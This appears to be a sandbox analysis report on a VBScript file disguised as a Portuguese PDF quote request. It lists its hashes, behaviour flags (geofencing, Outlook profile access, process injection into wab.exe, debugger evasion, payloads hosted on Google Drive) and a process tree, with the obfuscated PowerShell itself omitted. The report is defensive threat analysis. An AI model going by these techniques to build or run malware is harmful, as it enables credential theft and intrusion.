Analysis
- max time kernel: 149s
- max time network: 154s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 21/03/2024, 17:07
- Static task: static1
- Behavioral task: behavioral1
  - Sample: Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs
  - Resource: win7-20240221-en
- Behavioral task: behavioral2
  - Sample: Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs
  - Resource: win10v2004-20240226-en
General
- Target: Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs
- Size: 20KB
- MD5: 6c172c78edfa9cf3fbcee9e6417b4ec0
- SHA1: 56d554a6cfae0cbee45a32ac9e7f261c910cd046
- SHA256: 18a00a0da74be3d89a29bd856617a1703ee83646f39a51d70cf9d9017bd1ffad
- SHA512: 881216852a4049ce32387b221791b9ba7c75c4decb9b869430842a7a540f52ec1a24ae9a41550e0feb0dcf58731dcdd2dda9bcd45c798e0403af0fefaa751c27
- SSDEEP: 384:CE68ihBTZ6i8ahvxSIp27nn15lNmpK2kn70Vuz3+44GE8gT:H68ihdgi/LfIn3lNmpK2k7Sau4m8M
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | WScript.exe
- Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | wab.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | wab.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | wab.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
  flow | ioc
  22 | drive.google.com
  26 | drive.google.com
  63 | drive.google.com
- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  pid | Process | count
  1088 | wab.exe | 2
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid | Process | count
  4956 | powershell.exe | 1
  1088 | wab.exe | 1
- Suspicious use of SetThreadContext (1 IoC)
  description | pid | Process | procid_target
  PID 4956 set thread context of 1088 | 4956 | powershell.exe | 115
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid | Process | count
  3484 | powershell.exe | 3
  4956 | powershell.exe | 4
- Suspicious behavior: MapViewOfSection (2 IoCs)
  pid | Process | count
  4956 | powershell.exe | 2
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 3484 | powershell.exe
  Token: SeDebugPrivilege | 4956 | powershell.exe
  Token: SeDebugPrivilege | 1088 | wab.exe
- Suspicious use of WriteProcessMemory (18 IoCs)
  description | pid | Process | procid_target | count
  PID 4824 wrote to memory of 3484 | 4824 | WScript.exe | 95 | 2
  PID 3484 wrote to memory of 2948 | 3484 | powershell.exe | 98 | 2
  PID 3484 wrote to memory of 4956 | 3484 | powershell.exe | 106 | 3
  PID 4956 wrote to memory of 4216 | 4956 | powershell.exe | 110 | 3
  PID 4956 wrote to memory of 2568 | 4956 | powershell.exe | 114 | 3
  PID 4956 wrote to memory of 1088 | 4956 | powershell.exe | 115 | 5
- outlook_office_path (1 IoC)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | wab.exe
- outlook_win_path (1 IoC)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | wab.exe
Processes
- C:\Windows\System32\WScript.exe (PID 4824)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs"
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3484)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script omitted]"
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe (PID 2948)
      Command line: "C:\Windows\system32\cmd.exe" /c set /A 115^^0
    - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe (PID 4956)
      Command line: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script omitted]"
      Signatures: Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (PID 4216)
        Command line: "C:\Windows\system32\cmd.exe" /c set /A 115^^0
      - C:\Program Files (x86)\windows mail\wab.exe (PID 2568)
        Command line: "C:\Program Files (x86)\windows mail\wab.exe"
      - C:\Program Files (x86)\windows mail\wab.exe (PID 1088)
        Command line: "C:\Program Files (x86)\windows mail\wab.exe"
        Signatures: Accesses Microsoft Outlook profiles; Suspicious use of NtCreateThreadExHideFromDebugger; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of AdjustPrivilegeToken; outlook_office_path; outlook_win_path
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3908)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3180 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
Network
MITRE ATT&CK Enterprise v15
Downloads